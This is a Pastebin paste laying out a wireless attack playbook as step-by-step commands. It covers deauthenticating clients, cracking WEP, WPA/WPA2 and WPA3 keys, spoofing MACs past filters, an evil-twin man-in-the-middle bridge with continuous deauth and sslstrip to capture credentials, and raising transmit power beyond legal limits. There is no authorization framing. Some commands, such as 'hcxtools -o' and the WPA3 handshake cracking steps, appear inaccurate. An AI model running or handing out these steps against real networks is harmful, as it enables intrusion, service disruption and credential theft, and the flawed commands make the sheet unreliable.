API tools faq
paste
Advertisement
Sweetening

Wireless Penetration Testing Cheat Sheet

Sweetening
Mar 3rd, 2025
59
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.06 KB | None | 0 0
raw download clone embed print report
  1. Wireless Penetration Testing Cheat Sheet
  2. Current Date - March 03, 2025
  3.  
  4. Note - Commands assume a Linux environment (e.g., Kali Linux) with tools like aircrack-ng, reaver, pyrit, hashcat, etc., installed. Replace wlan0/wlan0mon with your wireless interface. Ensure your adapter supports monitor mode and packet injection (e.g., Alfa AWUS036NHA).
  5.  
  6. PREPARATION
  7. Verify Wireless Interface
  8. Check available interfaces
  9.  
  10. iwconfig
  11.  
  12. Kill interfering processes
  13.  
  14. airmon-ng check kill
  15.  
  16. Verify adapter capabilities
  17.  
  18. iw list
  19.  
  20. Enable Monitor Mode
  21. ifconfig wlan0 down
  22.  
  23. airmon-ng start wlan0
  24.  
  25. Confirms wlan0mon is created
  26.  
  27. iwconfig wlan0mon mode monitor
  28.  
  29. ifconfig wlan0mon up
  30.  
  31. Increase Wi-Fi TX Power (Optional)
  32. Set regulatory domain (e.g., Bolivia for higher power)
  33.  
  34. iw reg set BO
  35.  
  36. Adjust TX power (max varies by adapter/country)
  37.  
  38. iwconfig wlan0mon txpower 30 - 30 dBm if supported
  39.  
  40. iwconfig - Verify
  41.  
  42. Change Wi-Fi Channel
  43. Set specific channel (1-14 for 2.4 GHz, higher for 5 GHz)
  44.  
  45. iwconfig wlan0mon channel <Channel>
  46.  
  47. WIRELESS RECONNAISSANCE
  48. Scan for Networks
  49. Broad scan (all channels, 2.4/5 GHz)
  50.  
  51. airodump-ng wlan0mon
  52.  
  53. Targeted scan (specific AP)
  54.  
  55. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  56.  
  57. Output saved as <FileName-01.cap> (PCAP format)
  58.  
  59. Note encryption type (WEP/WPA/WPA2/WPA3)
  60.  
  61. Find Hidden SSID
  62. Deauthenticate clients to reveal SSID
  63.  
  64. airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
  65.  
  66. aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon
  67.  
  68. Watch airodump-ng for SSID to appear
  69.  
  70. Identify Victim MAC
  71. From airodump-ng output, note client MAC under "STATION" column
  72.  
  73. Filter active clients with strong signal
  74.  
  75. WEP CRACKING
  76. Method 1 - Fake Authentication Attack
  77. airmon-ng start wlan0
  78.  
  79. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  80.  
  81. Check your MAC
  82.  
  83. macchanger --show wlan0mon
  84.  
  85. aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
  86.  
  87. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
  88.  
  89. aircrack-ng -b <BSSID> <FileName-01.cap>
  90.  
  91. Method 2 - ARP Replay Attack
  92. airmon-ng start wlan0
  93.  
  94. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  95.  
  96. macchanger --show wlan0mon
  97.  
  98. aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
  99.  
  100. aircrack-ng -b <BSSID> <FileName-01.cap>
  101.  
  102. Method 3 - Chop Chop Attack
  103. airmon-ng start wlan0
  104.  
  105. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  106.  
  107. macchanger --show wlan0mon
  108.  
  109. aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
  110.  
  111. aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
  112.  
  113. When prompted, press 'y' to use packet; generates <replay_dec-.xor>
  114.  
  115. packetforge-ng -0 -a <BSSID> -h <OurMac> -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-.xor -w <FileName2>
  116.  
  117. aireplay-ng -2 -r <FileName2> wlan0mon
  118.  
  119. aircrack-ng <FileName-01.cap>
  120.  
  121. Method 4 - Fragmentation Attack
  122. airmon-ng start wlan0
  123.  
  124. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  125.  
  126. macchanger --show wlan0mon
  127.  
  128. aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
  129.  
  130. aireplay-ng -5 -b <BSSID> -h <OurMac> wlan0mon
  131.  
  132. Press 'y' when prompted; generates <frag-.xor>
  133.  
  134. packetforge-ng -0 -a <BSSID> -h <OurMac> -k 255.255.255.255 -l 255.255.255.255 -y frag-.xor -w <FileName2>
  135.  
  136. aireplay-ng -2 -r <FileName2> wlan0mon
  137.  
  138. aircrack-ng <FileName-01.cap>
  139.  
  140. Method 5 - SKA (Shared Key Authentication) Cracking
  141. airmon-ng start wlan0
  142.  
  143. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  144.  
  145. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
  146.  
  147. ifconfig wlan0mon down
  148.  
  149. macchanger --mac <VictimMac> wlan0mon
  150.  
  151. ifconfig wlan0mon up
  152.  
  153. aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
  154.  
  155. aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
  156.  
  157. aircrack-ng <FileName-01.cap>
  158.  
  159. WPA/WPA2 CRACKING
  160. Method 1 - WPS Attack
  161. Check for WPS-enabled APs
  162.  
  163. wash -i wlan0mon -C
  164.  
  165. Crack WPS
  166.  
  167. reaver -i wlan0mon -b <BSSID> -vv -S
  168.  
  169. Specific PIN attack (if known)
  170.  
  171. reaver -i wlan0mon -c <Channel> -b <BSSID> -p <PinCode> -vv -S
  172.  
  173. Note - AP must support WPS; use --delay or --lock-delay if locked out
  174.  
  175. Method 2 - Dictionary Attack (aircrack-ng)
  176. airmon-ng start wlan0
  177.  
  178. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  179.  
  180. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon - Capture handshake
  181.  
  182. aircrack-ng -w <WordlistFile> -b <BSSID> <FileName-01.cap>
  183.  
  184. Method 3 - Crack with Hashcat (Modern GPU Attack)
  185. airmon-ng start wlan0
  186.  
  187. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  188.  
  189. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon - Capture handshake
  190.  
  191. Convert cap to hccapx (for Hashcat)
  192.  
  193. hcxtools -o <FileName>.hccapx <FileName-01.cap>
  194.  
  195. Crack with Hashcat
  196.  
  197. hashcat -m 2500 -a 0 <FileName>.hccapx <WordlistFile> --force
  198.  
  199. Show cracked key
  200.  
  201. hashcat -m 2500 <FileName>.hccapx --show
  202.  
  203. Method 4 - Crack with John The Ripper
  204. airmon-ng start wlan0
  205.  
  206. airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  207.  
  208. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
  209.  
  210. Convert cap to John format
  211.  
  212. aircrack-ng <FileName-01.cap> -J <JohnFile>
  213.  
  214. cd /pentest/passwords/john
  215.  
  216. ./john --wordlist=<Wordlist> --rules <JohnFile>
  217.  
  218. Method 5 - Crack with coWPAtty
  219. airmon-ng start wlan0
  220.  
  221. airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  222.  
  223. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
  224.  
  225. cowpatty -r <FileName-01.cap> -f <Wordlist> -s <ESSID>
  226.  
  227. Precompute hashes (faster cracking)
  228.  
  229. genpmk -s <ESSID> -f <Wordlist> -d <HashesFileName>
  230.  
  231. cowpatty -r <FileName-01.cap> -d <HashesFileName> -s <ESSID>
  232.  
  233. Method 6 - Crack with Pyrit
  234. Prerequisite - Install Pyrit with GPU support (apt-get install pyrit)
  235.  
  236. airmon-ng start wlan0
  237.  
  238. airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  239.  
  240. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
  241.  
  242. pyrit -r <FileName-01.cap> -b <BSSID> -i <Wordlist> attack_passthrough
  243.  
  244. Precompute database
  245.  
  246. pyrit -i <Wordlist> import_passwords
  247.  
  248. pyrit -e <ESSID> create_essid
  249.  
  250. pyrit batch
  251.  
  252. pyrit -r <FileName-01.cap> attack_db
  253.  
  254. Method 7 - Precomputed WPA Keys Database Attack
  255. airmon-ng start wlan0
  256.  
  257. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  258.  
  259. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
  260.  
  261. echo "<ESSID>" > ESSID.txt
  262.  
  263. airolib-ng NEW_DB --import essid ESSID.txt
  264.  
  265. airolib-ng NEW_DB --import passwd <DictionaryFile>
  266.  
  267. airolib-ng NEW_DB --clean all
  268.  
  269. airolib-ng NEW_DB --batch
  270.  
  271. airolib-ng NEW_DB --stats
  272.  
  273. airolib-ng NEW_DB --verify all
  274.  
  275. aircrack-ng -r NEW_DB <FileName-01.cap>
  276.  
  277. WPA3 CONSIDERATIONS (Limited as of 2025)
  278. Reconnaissance
  279. Check for WPA3 with airodump-ng (shows "WPA3" or "SAE" in encryption)
  280.  
  281. Dragonfly Handshake Attack
  282. Capture handshake
  283.  
  284. airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
  285.  
  286. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
  287.  
  288. Convert to Hashcat format
  289.  
  290. hcxtools -o <FileName>.hc22000 <FileName-01.cap>
  291.  
  292. Crack (requires strong GPU and wordlist)
  293.  
  294. hashcat -m 22000 -a 0 <FileName>.hc22000 <WordlistFile>
  295.  
  296. Note - WPA3 is resistant; success depends on weak passwords
  297.  
  298. BYPASS DEFENSES
  299. Bypass MAC Filtering
  300. airmon-ng start wlan0
  301.  
  302. airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
  303.  
  304. aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
  305.  
  306. ifconfig wlan0mon down
  307.  
  308. macchanger --mac <VictimMac> wlan0mon
  309.  
  310. ifconfig wlan0mon up
  311.  
  312. aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
  313.  
  314. Bypass Open Network (Captive Portal)
  315. Connect to open AP
  316.  
  317. iwconfig wlan0 essid <ESSID>
  318.  
  319. dhclient wlan0
  320.  
  321. Spoof MAC if filtered
  322.  
  323. macchanger --mac <VictimMac> wlan0
  324.  
  325. Use browser to bypass portal or intercept creds with MITM
  326.  
  327. MAN-IN-THE-MIDDLE (MITM) ATTACK
  328. Prerequisite - Install bridge-utils (apt-get install bridge-utils)
  329.  
  330. airmon-ng start wlan0
  331.  
  332. airbase-ng -e "<FakeESSID>" wlan0mon - Creates at0 interface
  333.  
  334. brctl addbr mitm-bridge
  335.  
  336. brctl addif mitm-bridge wlan0mon
  337.  
  338. brctl addif mitm-bridge at0
  339.  
  340. ifconfig wlan0mon 0.0.0.0 up
  341.  
  342. ifconfig at0 0.0.0.0 up
  343.  
  344. ifconfig mitm-bridge up
  345.  
  346. aireplay-ng --deauth 0 -a <VictimBSSID> wlan0mon - Continuous deauth
  347.  
  348. dhclient mitm-bridge & - Get IP from real network
  349.  
  350. wireshark & - Select mitm-bridge interface
  351.  
  352. Optional - SSLstrip or intercept creds
  353.  
  354. sslstrip -l 8080 &
  355.  
  356. POST-EXPLOITATION
  357. Connect to Network (WEP)
  358. ifconfig wlan0mon down
  359.  
  360. iwconfig wlan0 mode managed
  361.  
  362. ifconfig wlan0 up
  363.  
  364. iwconfig wlan0 essid <ESSID> key <CrackedKey>
  365.  
  366. dhclient wlan0
  367.  
  368. Connect to Network (WPA/WPA2)
  369. ifconfig wlan0mon down
  370.  
  371. iwconfig wlan0 mode managed
  372.  
  373. ifconfig wlan0 up
  374.  
  375. wpa_passphrase <ESSID> <CrackedKey> > wpa.conf
  376.  
  377. wpa_supplicant -i wlan0 -c wpa.conf &
  378.  
  379. dhclient wlan0
  380.  
  381. Connect to Network (WPA3)
  382. Same as WPA2, use cracked key in wpa_supplicant
  383.  
  384. Cleanup
  385. Stop monitor mode
  386.  
  387. airmon-ng stop wlan0mon
  388.  
  389. ifconfig wlan0 up
  390.  
  391. service network-manager restart
  392.  
  393. TROUBLESHOOTING
  394. Monitor mode fails - Verify adapter supports monitor mode (iw list)
  395.  
  396. No handshake captured - Increase deauth count (-0 20) or target multiple clients
  397.  
  398. TX power not changing - Check regulatory domain (iw reg get) and adapter specs
  399.  
  400. WPS locked - Adjust reaver delay (--delay=5) or try later
  401.  
  402. Hashcat fails - Install GPU drivers (e.g., NVIDIA CUDA)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!